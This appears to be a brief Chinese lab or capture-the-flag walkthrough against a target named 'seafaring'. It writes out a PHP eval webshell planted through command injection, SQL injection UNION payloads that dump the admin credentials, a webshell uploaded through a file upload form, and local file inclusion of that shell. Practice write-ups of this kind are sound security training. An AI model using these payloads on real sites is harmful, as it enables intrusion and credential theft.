seafaring寻找漏洞
一.命令执行漏洞
(1)下面有一个输入框,输入ls进行查看
(2)输入echo '<?php phpinfo();?>' > qxl.php 并且访问
(3)写入一句话木马,并且访问蚁剑连接
echo '<?php @eval($_POST['cmd'];?>'>q.php
二.sql注入
测试sql注入为数字型
(1)查询数据库
-1 union select 1,2,database()
(2)查看表名
-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()#
(3)查看列名
1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='admin' #
(4)查看admin的账号和密码
-1 union select 1,2,group_concat(user_id,user_name,user_pass) from admin#
(5)最终得出账号是admin,密码是mysql
三.文件上传漏洞
(1)使用得到的账号密码进行登录,进去之后发现可以上传文件
(2)写入一句话木马到qxl.php然后上传,并且访问上传成功后得到的路径
(3)蚁剑连接
四.文件包含漏洞
(1)首页的关于界面存在文件包含漏洞
(2).访问之前写入的qxl.php中进行查看发现远程文件包含关闭,本地文件可以访问
(3).包含之前的q.php一句话木马,访问并且蚁剑连接
